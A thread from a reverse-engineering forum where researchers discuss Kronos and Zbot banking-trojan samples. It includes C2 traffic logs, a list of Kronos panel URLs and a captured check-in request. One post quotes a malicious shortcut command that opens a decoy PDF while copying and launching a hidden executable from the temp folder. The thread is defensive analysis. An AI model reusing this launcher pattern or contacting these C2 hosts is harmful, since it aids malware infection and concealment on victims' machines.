A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #25079  by Kafeine
 Tue Jan 27, 2015 6:57 pm
A fresh one (pushed in Sweet Orange).

01/27/2015-08:15:33.214071 bitcoind.su [**] /krpanel/connect.php [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 89 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
01/27/2015-08:15:34.625277 bitcoind.su [**] /krpanel/connect.php?a=1 [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 41 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
Attachments
1 Kronos sample. Password: infected
(272.67 KiB) Downloaded 145 times
 #27311  by pwnslinger
 Wed Nov 25, 2015 6:50 pm
Hi,
using VB6 packing method, execute shellcode which is packed by MoleBox or sth like that (PUSHAD, CALL).
but i dunno why i just got into this loop. enumerates through all procedure names...
hint me plz

sample also attached below:
Attachments
(273.28 KiB) Downloaded 76 times
unpack.jpg
unpacking loop
unpack.jpg (403.43 KiB) Viewed 1735 times
 #27316  by comak
 Thu Nov 26, 2015 11:14 am
This is Kronos,
Code: Select all
http://bitcoind.su:80/krpanel/connect.php
http://bulletvpn.su:80/krpanel/connect.php
http://thereturn15.su:80/krpanel/connect.php
http://skycard.su:80/krpanel/connect.php
http://cyberhosting.su:80/krpanel/connect.php
http://skycard.su:80/krpanel/connect.php
cheers,
mak
 #27317  by EP_X0FF
 Thu Nov 26, 2015 11:33 am
pwnslinger wrote:Hi,
using VB6 packing method, execute shellcode which is packed by MoleBox or sth like that (PUSHAD, CALL).
but i dunno why i just got into this loop. enumerates through all procedure names...
hint me plz

sample also attached below:
As with most of malware crypters used for ZBot it "decryption" based on moment when RunPE executed. Set break on CreateProcess and dump memory region it will attempt to write to the zombie target process.

https://www.virustotal.com/en/file/e4e0 ... 448537374/

"Unpacked" Kronos in attach. Posts moved.
Attachments
pass: infected
(110.16 KiB) Downloaded 92 times
 #27343  by henices
 Thu Dec 03, 2015 2:13 am
Kafeine wrote:A fresh one (pushed in Sweet Orange).

01/27/2015-08:15:33.214071 bitcoind.su [**] /krpanel/connect.php [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 89 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
01/27/2015-08:15:34.625277 bitcoind.su [**] /krpanel/connect.php?a=1 [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 41 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
Code: Select all
POST /krpanel/connect.php HTTP/1.1 
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) 
Host: bitcoind.su 
Content-Length: 74 
Cache-Control: no-cache  

WzW,c`cfgcgzcozccazedzeefdfdb*W
attachment is the report.
Attachments
(117.86 KiB) Downloaded 74 times
 #27350  by pwnslinger
 Thu Dec 03, 2015 8:07 pm
EP_X0FF wrote:
pwnslinger wrote:Hi,
using VB6 packing method, execute shellcode which is packed by MoleBox or sth like that (PUSHAD, CALL).
but i dunno why i just got into this loop. enumerates through all procedure names...
hint me plz

sample also attached below:
As with most of malware crypters used for ZBot it "decryption" based on moment when RunPE executed. Set break on CreateProcess and dump memory region it will attempt to write to the zombie target process.

https://www.virustotal.com/en/file/e4e0 ... 448537374/

"Unpacked" Kronos in attach. Posts moved.
Thanks EP. ;)

after dumping second stage (explorer.exe) (change EP with PUSH/RET) using EBFE method for attaching using ollydbg.
i dunno why when i wanna set toggle bp on code, olly can't and run (memry regions are RWC!)
then i used f4 (run till selection) and hw bp.
but when call SYSENTER... i can't take control back to myself.
Attachments
sysenter.JPG
sysenter
sysenter.JPG (122.47 KiB) Viewed 1568 times
 #27859  by pwnslinger
 Fri Feb 12, 2016 10:27 am
i got another variant of Zbot on my system today.
.rsrc section is base64 encoded. first i thought about Ranbyus banking trojan.
also a shortcut created for running malware with this content:

%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe /c "start %cd%Statically_detecting_use_after_free_on_binary_code.pdf & attrib -s -h %cd%DqGLtNo.exe & xcopy /F /S /Q /H /R /Y %cd%DqGLtNo.exe %temp%\JHQtm\ & attrib +s +h %cd%DqGLtNo.exe & start %temp%\JHQtm\Dq

export table contains callback function. i checked it by Ida and i didn't see any useful call.
where i should start?


sample attached.
Attachments
sample
(119.7 KiB) Downloaded 55 times
base64.GIF
encoded base64 payload
base64.GIF (27.35 KiB) Viewed 1478 times